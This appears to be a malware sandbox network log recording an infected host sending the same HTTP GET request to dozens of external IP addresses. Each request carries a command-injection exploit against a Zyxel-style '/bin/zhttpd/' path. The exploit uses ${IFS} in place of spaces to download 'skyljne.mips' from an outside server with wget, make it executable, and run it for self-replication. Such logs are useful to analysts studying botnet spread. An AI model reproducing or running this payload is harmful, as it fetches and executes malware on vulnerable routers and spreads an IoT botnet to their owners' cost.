                                        Jan 14, 2024 16:19:01.857623100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9044192.168.2.133675031.223.243.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857662916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9045192.168.2.1347272147.1.20.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857728004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9046192.168.2.1345356101.127.167.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857785940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9047192.168.2.1340932201.89.254.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857848883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9048192.168.2.1338340183.180.202.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857897043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9049192.168.2.134776473.211.130.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857937098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9050192.168.2.135183838.29.114.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.857969999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9051192.168.2.1352684204.12.205.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858026028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9052192.168.2.1335994130.55.226.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858059883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9053192.168.2.1348590109.196.19.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858144045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9054192.168.2.1341660146.77.0.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858211040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9055192.168.2.1335810201.71.29.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858274937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9056192.168.2.1341778156.54.100.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858333111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9057192.168.2.1337066140.157.137.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858412027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9058192.168.2.134392020.192.86.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858478069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9059192.168.2.1349862180.161.173.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858542919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9060192.168.2.134596486.223.247.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858609915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9061192.168.2.1345698136.170.206.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858685017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9062192.168.2.133805070.84.147.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858746052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9063192.168.2.133569672.117.167.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858793974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9064192.168.2.1338256102.82.229.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858834028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9065192.168.2.13443705.127.206.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858896971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9066192.168.2.135275858.90.87.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.858964920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9067192.168.2.133607259.89.231.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859009981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9068192.168.2.133278888.51.208.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859066010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9069192.168.2.1338720173.22.77.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859101057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9070192.168.2.1351438108.39.126.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859186888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9071192.168.2.1351996198.33.97.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859246969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9072192.168.2.135389039.216.248.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859327078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9073192.168.2.1336308140.118.217.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859384060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9074192.168.2.134388445.211.149.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859431982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9075192.168.2.1344760140.115.125.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859498978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9076192.168.2.1356568180.12.131.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859568119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9077192.168.2.1360392189.88.162.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859613895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9078192.168.2.135601058.174.73.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859648943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9079192.168.2.13436705.181.230.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859709978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9080192.168.2.1350098175.103.131.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859771013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9081192.168.2.133287034.239.200.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859827995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9082192.168.2.134568499.240.19.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.859890938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9083192.168.2.135243684.190.216.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860013008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9084192.168.2.1334912193.53.72.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860152960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9085192.168.2.1348688221.87.32.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860192060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9086192.168.2.135025460.33.112.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860250950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9087192.168.2.133725241.232.3.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860316992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9088192.168.2.133557646.29.244.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860373020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9089192.168.2.135833882.165.232.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860414982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9090192.168.2.135983842.148.35.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860486031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9091192.168.2.1351896109.147.40.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860558987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9092192.168.2.13534769.21.51.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860611916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9093192.168.2.134102454.111.138.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860651016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9094192.168.2.134332850.123.240.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860721111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9095192.168.2.1336802208.2.10.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860764027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9096192.168.2.134733817.155.103.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860835075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9097192.168.2.1342030212.221.97.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860897064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9098192.168.2.134080238.78.96.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860930920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9099192.168.2.1345844108.223.248.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.860971928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9100192.168.2.133465273.92.102.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861047983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9101192.168.2.134664470.103.150.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861079931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9102192.168.2.134078699.72.240.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861104965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9103192.168.2.1339426117.49.160.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861182928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9104192.168.2.1354346184.52.157.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861232042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9105192.168.2.134960638.188.81.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:01.861294031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9106192.168.2.136027281.211.29.237443
                                        TimestampBytes transferredDirectionData
